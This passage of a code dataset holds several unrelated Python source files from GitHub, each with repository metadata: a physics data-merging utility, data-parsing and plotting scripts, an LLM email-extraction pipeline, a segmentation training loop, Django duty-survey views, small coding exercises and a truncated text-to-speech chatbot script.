'+ str(fullpath))\n errorEvents+= proc+err\n\n\n except OSError as ex:\n #file missing?\n errorEvents+= f.getFieldByName('Processed') + f.getFieldByName('ErrorEvents')\n self.logger.error('fastHadd pb file is missing? : '+ fullpath)\n self.logger.exception(ex)\n\n filesize=0\n hasError=False\n if numFiles>0:\n time_start = time.time()\n if setAsError:\n hasError=True\n else:\n p = subprocess.Popen(command_args,shell=False,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n p_out,p_err = map(decodecstr,p.communicate())\n time_delta = time.time()-time_start\n if p.returncode!=0:\n if len(p_out)>100: p_out = p_out[:100]\n self.logger.error('fastHadd returned with exit code '+str(p.returncode)+' and response: ' + str(p_out) + '. Merging parameters given:'+str(command_args) +' ,file sizes(B):'+str(inFileSizes))\n #DQM more verbose debugging\n try:\n filesize = os.stat(fullOutputPath).st_size\n self.logger.error('fastHadd reported to fail at merging, while output pb file exists! 
'+ fullOutputPath + ' with size(B): '+str(filesize))\n except:\n pass\n self.setFieldByName('ReturnCodeMask', str(p.returncode))\n hasError=True\n else:\n ret_len=0\n try:\n ret_len=len(p_out)\n except:\n pass\n self.logger.info('fastHadd merging of ' + str(len(inFileSizes)) + ' files took ' + str(time_delta) + ' seconds')\n if ret_len>0:\n if ret_len<100:\n self.logger.info('fastHadd output:'+ p_out)\n else:\n self.logger.info('fastHadd output (truncated):'+ p_out[:100])\n\n for f in command_args[5:]:\n try:\n if hasError==False or setAsError==True: os.remove(f)\n except OSError as ex:\n self.logger.warning('exception removing file '+f+' : '+str(ex))\n else:\n hasError=True\n\n if hasError:\n errorEvents+=processedEvents\n processedEvents=0\n acceptedEvents=0\n outputName=\"\"\n filesize=0\n\n #correct for the missing event count in input file (when we have a crash)\n if totalEvents>processedEvents+errorEvents: errorEvents += totalEvents - processedEvents - errorEvents\n\n self.setFieldByName('Processed',str(processedEvents))\n self.setFieldByName('Accepted',str(acceptedEvents))\n self.setFieldByName('ErrorEvents',str(errorEvents))\n self.setFieldByName('Filelist',outputName)\n self.setFieldByName('Filesize',str(filesize))\n #self.esCopy() #happens after move to output\n try:self.data['MergingTime']=time_delta\n except:pass\n try:self.data['MergingTimePerFile']=time_delta/numFiles\n except:self.data['MergingTimePerFile']=0\n #fastHadd installation directory\n if detFastHadd:\n self.data['fastHaddInstPath']=install_dir\n\n self.writeout()\n return outputName\n\n\nclass Aggregator(object):\n def __init__(self,definitions,newData,oldData):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.definitions = definitions\n self.newData = newData\n self.oldData = oldData\n\n def output(self):\n self.result = list(map(self.action,self.definitions,self.newData,self.oldData))\n return self.result\n\n def action(self,definition,data1,data2=None):\n actionName = \"action_\"+definition[\"operation\"]\n if hasattr(self,actionName):\n try:\n return getattr(self,actionName)(data1,data2)\n except AttributeError as e:\n self.logger.exception(e)\n return None\n else:\n self.logger.warning(\"bad operation: %r\" %actionName)\n return None\n\n def action_binaryOr(self,data1,data2):\n try:\n res = int(data1) | int(data2)\n except TypeError as e:\n self.logger.exception(e)\n res = 0\n return str(res)\n\n def action_merge(self,data1,data2):\n if not data2: return data1\n file1 = fileHandler(data1)\n\n file2 = fileHandler(data2)\n newfilename = \"_\".join([file2.run,file2.ls,file2.stream,file2.host])+file2.ext\n file2 = fileHandler(newfilename)\n\n if not file1 == file2:\n if data1: self.logger.warning(\"found different files: %r,%r\" %(file1.filepath,file2.filepath))\n return file2.basename\n return file1.basename\n\n def action_sum(self,data1,data2):\n try:\n res = int(data1) + int(data2)\n except TypeError as e:\n self.logger.exception(e)\n res = 0\n return str(res)\n\n def action_same(self,data1,data2):\n if str(data1)=='' or str(data1)=='0' or str(data1)=='N/A':\n return str(data2)\n if str(data2)=='' or str(data2)=='0' or str(data2)=='N/A':\n return str(data1)\n if str(data1) == str(data2):\n return str(data1)\n else:\n return \"N/A\"\n\n def action_cat(self,data1,data2):\n if data2 and data1: return str(data1)+\",\"+str(data2)\n elif data1: return str(data1)\n elif data2: return str(data2)\n else: return \"\"\n\n def action_adler32(self,data1,data2):\n return 
\"-1\"\n","repo_name":"cmsdaq/hltd","sub_path":"python/aUtils.py","file_name":"aUtils.py","file_ext":"py","file_size_in_byte":42214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4107177411","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nname: meta_parse\ndate: 8 aug 2015\nauthors: Evan Gall, Erick Daniszewski\ndescription:\n Command line tool to format SRT spectrum output data files to a gnuplot-readable format.\n The current output format is given by the example below:\n\n date obsn az el freq ...\n ----- ----- ----- ----- ----\n 2015:208:19:08:13 0 0 60 1421.5000 ...\n 2015:208:19:08:26 1 0 60 1421.5000 ...\n ... ... ... ... ...\n\"\"\"\nfrom argparse import ArgumentParser\nimport time\n\n\ndef info_parse(input_file, output_file):\n \"\"\"\n Parses information from the input file then formats it so it is gnuplot readable and\n writes the formatted data to a file.\n\n :param input_file: file name of the file to parse\n :type input_file: str\n\n :param output_file: file name the formatted data will be saved to\n :type output_file: str\n\n :return: None\n \"\"\"\n # open the input file and read the data, line by line, into the input data list. Each line\n # that is read in will be split (by spaces) into a list, and any empty indicies in that list\n # will be filtered out. After this process, the input_data file should be a list of lists.\n with open(input_file, 'rb') as f:\n input_data = [filter(None, line.replace('\\n', '').split(' ')) for line in f.readlines()]\n\n header_info = extract_header_info(input_data) # get the column labels\n data = extract_values(input_data) # get the data rows\n\n # determine the formatting separation. this works by checking for the max size of the string\n # at the i-th index of every list in the data list, then adding an arbitrary spacer distance\n # (which in this case is 5). This max-size data is used to generate a formatter string which\n # denotes left-alignment and ensures column width of max_size+5\n max_vals = []\n for i in range(len(data[0])-1):\n max_val = 0\n for j in range(len(data)-1):\n max_val = max(max_val, len(data[j][i]))\n max_vals.append(str(max_val + 5))\n\n formatter_string = '{:<' + '}{:<'.join(max_vals) + '}'\n\n # write the data to the file\n with open(output_file, 'w') as f:\n # write the header to the file\n f.write('#' + formatter_string.format(*header_info) + '\\n')\n\n # write the data to the file\n for data_row in data:\n f.write(' ' + formatter_string.format(*data_row) + '\\n')\n\n\ndef extract_header_info(data):\n \"\"\"\n Extract column header info from file\n\n :param data:\n :return:\n \"\"\"\n header_info = []\n for line in data[:2]:\n if 'MHz' in line:\n # We don't use 'MHz', and it messes with our ordering. The solution? Get rid of it!\n line.remove('MHz')\n header_info.extend(line[::2])\n return header_info\n\n\ndef extract_values(data):\n \"\"\"\n Extract data values from file\n\n :param data:\n :return:\n \"\"\"\n values = []\n tmp = []\n for i, line in enumerate(data):\n if i % 4 == 0 or i % 4 == 1:\n if 'MHz' in line:\n # We don't use 'MHz', and it messes with our ordering. The solution? Get rid of it!\n line.remove('MHz')\n tmp.extend(line[1::2])\n\n if i % 4 == 1:\n values.append(tmp)\n tmp = []\n\n return values\n\n\nif __name__ == \"__main__\":\n # -----------------------\n # Argument Parser Setup\n # -----------------------\n description = 'parser to format data into a gnuplot-readable form. 
meta_parse extracts the meta-information ' \\\n                  'recorded for each observation in the data file. the output file it generates contains rows ' \\\n                  'for every observation with associated meta-information and columns corresponding to each bit ' \\\n                  'of meta-information, e.g.: \\n\\n date, obsn, az, el, freq_MHz, Tsys, Tant, vlsr, glat, glon, ' \\\n                  'source, Fstart, fstop, spacing, bw, fbw, nfreq, nsam, npoint, integ, sigma'\n\n    in_help = 'name of the file to parse'\n    out_help = 'name of the output file. if unspecified, the file will be named in the format: YYYY_MM_DD.hh-mm-ss.txt'\n\n    dlft_out = 'meta_{}.txt'.format(time.strftime(\"%Y_%m_%d.%H-%M-%S\"))\n\n    # Initialize instance of an argument parser\n    parser = ArgumentParser(description=description)\n\n    # Add required arguments\n    parser.add_argument('input_file', help=in_help, type=str)\n\n    # Add optional arguments, with given default values if user gives no args\n    parser.add_argument('-o', '--output', default=dlft_out, type=str, help=out_help)\n\n    # Get the arguments\n    args = parser.parse_args()\n\n    # -----------------------\n    # Parse the data\n    # -----------------------\n    info_parse(args.input_file, args.output)\n","repo_name":"BenningtonCS/Telescope-2014","sub_path":"utils/gnuplot/meta_parse.py","file_name":"meta_parse.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"16624861072","text":"import json\n\nimport APIrequests\nimport os\nimport mysql.connector\nimport time\n\nprocessedDir = 'processedEmails/'\ntokensUsed = 0\n\nmydb = mysql.connector.connect(\n    host=\"\",\n    user=\"\",\n    password=\"\",\n    database=\"\"\n)\n\n\ndef str2bool(v):\n    return v.lower() in (\"true\", \"1\")\n\n\ntotalProcessTime = \"\"\ntotalExtractionTime = \"\"\ntotalMatchingTime = \"\"\n\nmycursor = mydb.cursor()\n\ntst = time.time()\nfor count, file in enumerate(os.listdir(processedDir)):\n    pst = time.time()\n\n    currentFile = str(open(processedDir + '/' + file, 'r', encoding='utf-8').read())\n\n    classifierResult = (APIrequests.gpt_classifier(str(open(processedDir + '/' + file, 'r', encoding='utf-8').read())))\n    tokensUsed += classifierResult[2]\n\n    time.sleep(0.5)\n\n    while classifierResult[0] in [\"\", None] or classifierResult[1] in [\"\", None]:\n        classifierResult = (\n            APIrequests.gpt_classifier(currentFile))\n        tokensUsed += classifierResult[2]\n        time.sleep(0.5)\n\n    # extract info from emails already in DB\n    mycursor.execute(\"SELECT id, company, object from llm4pm.emaildata\")\n\n    sqlresult = mycursor.fetchall()\n\n    time.sleep(0.5)\n\n    match = bool(0)\n    matchID = None\n\n    fileMatchingStart = time.time()\n\n    for x in sqlresult:\n\n        time.sleep(0.5)\n\n        # matching of company and object with entries in database\n        comparison = APIrequests.gpt_entryComparer(x[1], x[2], classifierResult[0], classifierResult[1])\n        comparisonResult = str2bool(comparison[0])\n        tokensUsed += comparison[1]\n\n        if not comparisonResult: # FALSE, no match found\n            continue\n\n        else: # TRUE, match found\n            match = True\n            matchID = x[0]\n            break\n\n    fileMatchingEnd = time.time()\n    totalMatchingTime += (str((fileMatchingEnd - fileMatchingStart)) + \"\\n\")\n\n    extractionStart = time.time()\n    # when no existing entry is found, store email information in DB (subject company/object and extracted info)\n    if not match:\n        # Extract new info without context\n        extractedInfo = APIrequests.gpt_extractorNew(currentFile)\n        tokensUsed += extractedInfo[1]\n\n        sql = \"INSERT INTO llm4pm.emaildata (company, 
object, extractedInfo) VALUES (%s, %s, %s)\"\n val = (classifierResult[0], classifierResult[1], extractedInfo[0])\n mycursor.execute(sql, val)\n mydb.commit()\n # print(\"inserted email: \" + file)\n # print(\"NEW\")\n\n # when an existing entry is found, update the extracted info\n if match:\n # get existing extracted info for use as context\n mycursor.execute(\"SELECT extractedInfo from llm4pm.emaildata WHERE id = \" + str(matchID))\n contextInfo = mycursor.fetchone()\n\n # Extract new info with context\n extractedInfo = APIrequests.gpt_extractorAdd(currentFile, contextInfo)\n\n # Extract new info without context\n # extractedInfo = APIrequests.gpt_extractorNew(currentFile)\n\n filteredInfo = json.dumps(extractedInfo[0])\n\n # update existing entry with new extracted info (overwrites context information)\n # sql = \"UPDATE llm4pm.emaildata set extractedInfo = %s WHERE id = %s\"\n # val = (filteredInfo, matchID)\n\n # insert extracted information in new row, for evaluation purposes\n sql = \"INSERT INTO llm4pm.emaildata (company, object, extractedInfo) VALUES (%s, %s, %s)\"\n val = (classifierResult[0], classifierResult[1], filteredInfo)\n\n mycursor.execute(sql, val)\n mydb.commit()\n\n # print(\"ADD\")\n tokensUsed += extractedInfo[1]\n\n extractionEnd = time.time()\n totalExtractionTime += (str((extractionEnd - extractionStart)) + \"\\n\")\n\n pet = time.time()\n totalProcessTime += (str((pet - pst)) + \"\\n\")\n\ntet = time.time()\nprint(\"Total tokens used: \" + str(tokensUsed))\nprint(\"total time\")\nprint(str(tet - tst))\nprint(\"total process time\")\nprint(totalProcessTime)\nprint(\"total matching time\")\nprint(totalMatchingTime)\nprint(\"total extraction time\")\nprint(totalExtractionTime)\n","repo_name":"ThureWiegel/LLM4PM_API_ACCESS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"4792955172","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nimport os\nimport setproctitle\nimport time\nimport gc\n\nimport numpy as np\nimport torch as th\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nimport torchlib.viz as viz\nimport torchlib.utils as utils\n\nimport gapps.datasets as datasets\nimport gapps.segmentation as seg\nimport gapps.metrics as metrics\nimport gapps.segmentation_models as models\n\n\nlog = logging.getLogger(\"gapps_segmentation\")\n\n\ndef main(args):\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n dset = datasets.ADESegmentationDataset(\n args.list_train, args)\n val_dset = datasets.ADESegmentationDataset(\n args.list_val, args)\n loader = DataLoader(dset, batch_size=args.batch_size, num_workers=4, shuffle=True)\n val_loader = DataLoader(val_dset, batch_size=args.batch_size)\n\n if args.model == \"baseline\":\n model = models.ReferenceSegmentation()\n elif args.model == \"bilateral\":\n model = models.Bilateral()\n\n crit = th.nn.NLLLoss2d(ignore_index=-1)\n\n if args.cuda:\n model = model.cuda()\n\n optimizer = th.optim.Adam(model.parameters(), lr=args.lr)\n\n env = os.path.basename(args.output)\n checkpointer = utils.Checkpointer(\n args.output, model, optimizer, verbose=False, interval=600)\n callback = seg.Callback(\n model, len(loader), val_loader, env=env)\n\n chkpt_name, _ = checkpointer.load_latest()\n log.info(\"Resuming from latest checkpoint {}.\".format(chkpt_name))\n\n ema = 
utils.ExponentialMovingAverage([\"loss\", \"acc\"])\n for epoch in range(args.num_epochs):\n # Training\n model.train(True)\n with tqdm(total=len(loader), unit=' batches') as pbar:\n # TODO: calculate accuracy\n pbar.set_description(\"Epoch {}/{}\".format(epoch+1, args.num_epochs))\n callback.on_epoch_begin(epoch)\n for batch_id, batch in enumerate(loader):\n optimizer.zero_grad()\n pred, loss = seg.forward_with_loss(batch, model, crit, cuda=args.cuda)\n loss.backward()\n optimizer.step()\n\n acc, _ = metrics.accuracy(batch, pred)\n\n ema.update(\"loss\", loss.data[0])\n ema.update(\"acc\", acc) \n\n logs = {\"loss\": ema[\"loss\"], \"acc\": ema[\"acc\"]*100}\n pbar.set_postfix(logs)\n pbar.update(1)\n checkpointer.periodic_checkpoint(epoch)\n\n # if pbar.n % 100 == 0:\n callback.on_batch_end(batch_id, logs)\n\n # if pbar.n == 5:\n # break\n\n # Validation\n model.train(False)\n with tqdm(total=len(val_loader), unit=' batches') as pbar:\n pbar.set_description(\"Epoch {}/{} (val)\".format(epoch+1, args.num_epochs))\n avg = utils.Averager([\"loss\", \"acc\"])\n for batch_id, batch in enumerate(val_loader):\n pred, loss = seg.forward_with_loss(batch, model, crit, cuda=args.cuda)\n\n acc, nvalid = metrics.accuracy(batch, pred)\n\n avg.update(\"loss\", loss.data[0], count=pred.shape[0])\n avg.update(\"acc\", acc, count=nvalid) \n\n break\n\n logs = {\"loss\": avg[\"loss\"], \"acc\": avg[\"acc\"]*100}\n pbar.set_postfix(logs)\n\n callback.on_epoch_end(epoch, logs)\n\n # save\n checkpointer.on_epoch_end(epoch)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # Path related arguments\n parser.add_argument('--list_train',\n default='data/ade20k/ADE20K_object150_train.txt')\n parser.add_argument('--list_val',\n default='data/ade20k/ADE20K_object150_val.txt')\n parser.add_argument('--root_img',\n default='data/ade20k/ADEChallengeData2016/images')\n parser.add_argument('--root_seg',\n default='data/ade20k/ADEChallengeData2016/annotations')\n\n # Data related arguments\n parser.add_argument('--num_val', default=128, type=int,\n help='number of images to evalutate')\n parser.add_argument('--num_class', default=150, type=int,\n help='number of classes')\n parser.add_argument('--imgSize', default=384, type=int,\n help='input image size')\n parser.add_argument('--segSize', default=384, type=int,\n help='output image size')\n\n parser.add_argument(\"--model\", default=\"baseline\", choices=[\"baseline\", \"bilateral\"])\n parser.add_argument(\"--output\", default=\"output/segmentation\")\n parser.add_argument(\"--lr\", type=float, default=1e-4)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--num_epochs\", type=int, default=100)\n parser.add_argument(\"--no-cuda\", dest=\"cuda\", action=\"store_false\")\n parser.add_argument(\"--nfilters\", type=int, default=9)\n parser.add_argument(\"--fsize\", type=int, default=5)\n parser.set_defaults(cuda=True)\n args = parser.parse_args()\n\n logging.basicConfig(\n format=\"[%(process)d] %(levelname)s %(filename)s:%(lineno)s | %(message)s\")\n log.setLevel(logging.INFO)\n setproctitle.setproctitle('gapps_segmentation')\n\n main(args)\n","repo_name":"mgharbi/gradient_apps","sub_path":"bin/train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"30683960385","text":"import sys, os.path, warnings\nimport numpy as np\nfrom colloids import experiment as xp\nfrom 
colloids.progressbar import ProgressBar\nfrom colloids import particles\n\nif __name__ == '__main__':\n    for trname in sys.argv[1:]:\n        print(trname)\n        x = xp.Experiment(trname)\n        pro = ProgressBar(x.size)\n        \n        #bounding box\n        m = []\n        M = []\n        for t, name in x.enum():\n            pos = np.loadtxt(name, skiprows=2)\n            m.append(pos.min(0))\n            M.append(pos.max(0))\n        m = np.min(m,0)\n        M = np.max(M, 0)\n        \n        #Compute structure factor at each time\n        Ss = np.zeros([x.size, 128])\n        for t, name in x.enum():\n            Ss[t] = particles.structure_factor(np.loadtxt(name, skiprows=2)-m, 128, M-m, maxNvec=300)\n            pro.animate(t)\n        #save in 0th value the value of q1, so that the q axis is q1*np.arange(len(S))\n        Ss[:,0] = 2*np.pi/np.max(M-m)\n        np.save(\n            os.path.join(x.path, os.path.splitext(x.trajfile)[0]+'_structure_factor.npy'), \n            Ss\n            )\n        #use the last Ss (a priori the most developed) to get the first and second minimum\n        fm = 1 + np.argmin(Ss[-1,1:])\n        fM = fm + np.argmax(Ss[-1,fm:])\n        sm = fM + np.argmin(Ss[-1,fM:])\n        qmax = (Ss[:,fm:sm]*np.arange(fm,sm)).sum(1)/Ss[:,fm:sm].sum(1)\n        peak_value = Ss[:,fm:sm].sum(1)\n        np.savetxt(\n            os.path.join(x.path, os.path.splitext(x.trajfile)[0]+'.qmax'), \n            np.column_stack((qmax * Ss[0,0], peak_value))\n            )\n        \n","repo_name":"MathieuLeocmach/gel-analysis","sub_path":"structure_factor.py","file_name":"structure_factor.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10334460087","text":"from datetime import timedelta\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.core.mail import EmailMessage\nfrom django.core.signing import TimestampSigner, SignatureExpired, BadSignature\nfrom django.urls import reverse\nfrom django.contrib.sites.shortcuts import get_current_site\n\nfrom entitaet.models import Person\nfrom entitaet.login import save_login, require_login, check_permission\nfrom .models import Dienst, Teilnahme\n\n\nsigner_umfragen = TimestampSigner(salt=\"DienstUmfrage\")\n\n\ndef umfrage_antwort(request, token, antwort):\n    try:\n        person_id, dienst_id = \\\n            signer_umfragen.unsign(token, max_age=timedelta(days=30)).split(\":\")\n        person = Person.objects.get(pk=person_id)\n        dienst = Dienst.objects.get(pk=dienst_id)\n    except (Person.DoesNotExist, BadSignature):\n        return HttpResponse(\"Authorization failed\", status=403)\n    except SignatureExpired:\n        return HttpResponse(\"Signature expired\", status=401)\n    else:\n        save_login(request, person)\n\n    teilnahme, _ = Teilnahme.objects.get_or_create(person=person, dienst=dienst)\n    teilnahme.vorab = antwort\n    teilnahme.save()\n\n    return redirect(reverse(\"dienst_info\", kwargs={\"dienst_id\": dienst.id}))\n\n\n@require_login\ndef umfrage_versenden(request, dienst_id):\n    try:\n        dienst = Dienst.objects.get(pk=dienst_id)\n        check_permission(request, dienst.gruppe, 3)\n    except Dienst.DoesNotExist:\n        pass\n    except ValueError:\n        return HttpResponse(\"Forbidden\", status=403)\n    else:\n        mitglieder = dienst.gruppe.get_mitglieder()\n        for person in mitglieder:\n            if not person.mail:\n                # TODO what now?\n                continue\n\n            token = signer_umfragen.sign(\"{}:{}\".format(person.id, dienst.id))\n            domain = get_current_site(request).domain\n            moeglichkeiten = Teilnahme.OPTIONS\n\n            links = []\n            for mc, ml in moeglichkeiten:\n                path = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": mc})\n                link = \"{}://{}{}\".format(request.scheme, domain, path)\n                links.append((link, ml))\n\n            
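# one mail per member, with one signed answer link per option\n            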
EmailMessage(subject=\"Abfrage: {}\".format(dienst), body=\" / \".join([link for link, ml in links]), to=[person.mail]).send()\n\n return HttpResponse(\"Versendet\")\n\n\n@require_login\ndef anwesenheit_setzen(request, dienst_id, person_id, vorab, ist):\n try:\n dienst = Dienst.objects.get(pk=dienst_id)\n person = Person.objects.get(pk=person_id)\n # TODO ausnahme fuer eigene dienste (person == session && dienst passt)\n check_permission(request, dienst.gruppe, 4)\n except (Person.DoesNotExist, Dienst.DoesNotExist):\n pass\n except ValueError:\n return HttpResponse(\"Forbidden\", status=403)\n else:\n teilnahme, _ = Teilnahme.objects.get_or_create(person=person, dienst=dienst)\n teilnahme.vorab = vorab\n teilnahme.ist = ist\n teilnahme.save()\n\n return redirect(reverse(\"dienst_info\", kwargs={\"dienst_id\": dienst.id}))\n\n\n@require_login\ndef dienst_info(request, dienst_id):\n try:\n dienst = Dienst.objects.get(pk=dienst_id)\n check_permission(request, dienst.gruppe, 3)\n except Dienst.DoesNotExist:\n pass\n except ValueError:\n return HttpResponse(\"Forbidden\", status=403)\n else:\n mitglieder = dienst.gruppe.get_mitglieder()\n teilnahmen = []\n for mitglied in mitglieder:\n try:\n teilnahme = Teilnahme.objects.get(person=mitglied, dienst=dienst)\n except Teilnahme.DoesNotExist:\n teilnahme = Teilnahme(person=mitglied, dienst=dienst)\n teilnahmen.append({\"person\": mitglied, \"teilnahme\": teilnahme})\n\n return render(request, \"dienst/info.html\", {\"dienst\": dienst, \"teilnahmen\": teilnahmen, \"optionen\": Teilnahme.OPTIONS})\n\n\ndef get_token(request):\n token = signer_umfragen.sign(\"1:1\")\n domain = get_current_site(request).domain\n path_an = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.ANWESEND})\n link_an = \"{}://{}{}\".format(request.scheme, domain, path_an)\n path_ab = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.ABWESEND})\n link_ab = \"{}://{}{}\".format(request.scheme, domain, path_ab)\n path_unklar = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.UNKLAR})\n link_unklar = \"{}://{}{}\".format(request.scheme, domain, path_unklar)\n\n links = \" - \".join([\"{}\".format(link, label) for label, link in {\"an\": link_an, \"ab\": link_ab, \"unklar\": link_unklar}.items()])\n return HttpResponse(links)\n","repo_name":"prauscher/thwin","sub_path":"dienst/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29213469194","text":"import requests\n\nheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0' }\n\n\ndef get_html(url):\n try:\n result = requests.get(url, headers = headers)\n result.raise_for_status()\n return result.text\n except requests.exceptions.RequestException as e: \n print(e)\n return False\n\n\n","repo_name":"andyoleinikov/TempSensor","sub_path":"req.py","file_name":"req.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43211260719","text":"#Guest list with message and pop\n\nguests=['matt','syedur','phil']\n\nleaving_guest=guests.pop(0)\n\nprint(leaving_guest.title()+\" wont be able to make it\\n\")\n\nguests.append('jimmy')\n\nfor guest in guests:\n print('Hello '+guest.title()+', you are invited to dinner at my 
house\\n')","repo_name":"frankcw/Python","sub_path":"CrashCourse/Chapter 3/3-5.py","file_name":"3-5.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6672729941","text":"#T(n) = O(n)\n#S(n) = O(n)\nclass Solution:\n def wordPattern(self, pattern: str, s: str) -> bool:\n pDict,sDict={},{}\n sArr=s.split(\" \")\n if len(pattern)!=len(sArr):\n return False\n for i in range(0,len(pattern)):\n if pDict.get(pattern[i],-1)==-1:\n pDict[pattern[i]]=sArr[i]\n else:\n if pDict[pattern[i]]!=sArr[i]:\n return False\n \n if sDict.get(sArr[i],-1)==-1: \n sDict[sArr[i]]=pattern[i]\n else:\n if sDict[sArr[i]]!=pattern[i]:\n return False\n return True","repo_name":"Gsubhashreddy/Hashing-1","sub_path":"wordPattern.py","file_name":"wordPattern.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"69951699123","text":"class Solution:\n '''\n time: O(n)\n space: O(n)\n '''\n def lengthOfLongestSubstring(self, s: str) -> int:\n hashmap = {}\n l = 0\n max_len = 0\n for r, char in enumerate(s):\n if (char in hashmap) and (hashmap[char] >= l):\n l = hashmap[char] + 1\n else:\n max_len = max(max_len, r - l + 1)\n hashmap[char] = r\n return max_len\n","repo_name":"FrancisTan88/Leetcode","sub_path":"medium/LongestSubstringWithoutRepeatingCharacters.py","file_name":"LongestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37679515284","text":"#!\"python.exe\"\r\nimport random\r\nfrom gtts import gTTS\r\nimport os\r\n\r\n#------------------------------- Set Library List and OML File Paths --------------------------------#\r\noslibli=\"Osiris Library List\\\\\" # ( import List of OML Libraries Path )\r\nomllibs=\"OML Speech Libraries\\\\\" # ( OML Libraries file path )\r\n\r\n#################################<<<<< FORBIDDEN SECTION 001 >>>>>####################################\r\n###################################### DON'T EDIT THESE EVER #########################################\r\n\r\n#----------------------------------- import List of OML Libraries -----------------------------------#\r\noml=open(oslibli+\"osiris.libs\",\"r\")\r\nscript=oml.readlines()\r\noml.close()\r\n\r\n#----------------------------- global variable to concat all lib contents ---------------------------#\r\nimports=\"\"\r\n\r\n#-------------------------------- function to concat all lib contents -------------------------------#\r\ndef reset():\r\n\tdef import_oml(oml_file):\r\n\t\tglobal imports\r\n\t\ttry:\r\n\t\t\toml=open(omllibs+oml_file,\"r\")\r\n\t\t\timports=imports+\"\\n\"+oml.read()\r\n\t\t\toml.close()\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\">>> Error[01]: Import File << \"+oml_file+\" >> Not Found\")\r\n\r\n#------------------------------------------- keywords list ------------------------------------------#\r\n\tcommand_list=[\"import\"]\r\n\r\n#----------------------------------------- Libraries Concat -----------------------------------------#\r\n\tfor code in script:\r\n\t\tfeeds=code.strip().split(\" \")\r\n\t\tif(feeds[0]==command_list[0]):\r\n\t\t\timport_oml(feeds[1])\r\n\r\nreset()\t\r\n###################################### DON'T EDIT THESE EVER #########################################\r\n\r\ndef speech(text):\r\n\tmytext = text\r\n\tlanguage = 'en'\r\n\tmyobj = gTTS(text=mytext, 
lang=language, slow=False) \r\n\tmyobj.save(\"osiris.mp3\") \r\n\tos.system(\"mpg123 osiris.mp3\") \r\n\r\n\r\nstate=\"0\"\r\n\r\ndef type1(sen):\r\n\tglobal state\r\n\t#print(state)\r\n\tif(sen[0]==\"shall\" or sen[0]==\"should\" or sen[0]==\"does\" or sen[0]==\"must\" or sen[0]==\"will\" or sen[0]==\"can\" or sen[0]==\"do\" or sen[0]==\"may\" or sen[0]==\"can\" or sen[0]==\"could\" or sen[0]==\"would\" or sen[0]==\"might\"):\r\n\t\tif(sen[1]==\"i\" or sen[1]==\"you\" or sen[1]==\"he\" or sen[1]==\"she\" or sen[1]==\"they\" or sen[1]==\"we\" or sen[1]==\"it\"):\r\n\t\t\tif(sen[1]==\"i\" or sen[1]==\"we\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"you\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"i\"\r\n\t\t\t\tstate=\"1\"\r\n\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"something\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\tx=\"\"\r\n\t\t\tx=x+sen[1]+\" \"+sen[0]\r\n\t\t\t#print(x)\r\n\t\t\tfor index in range(2,len(sen),1):\r\n\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and 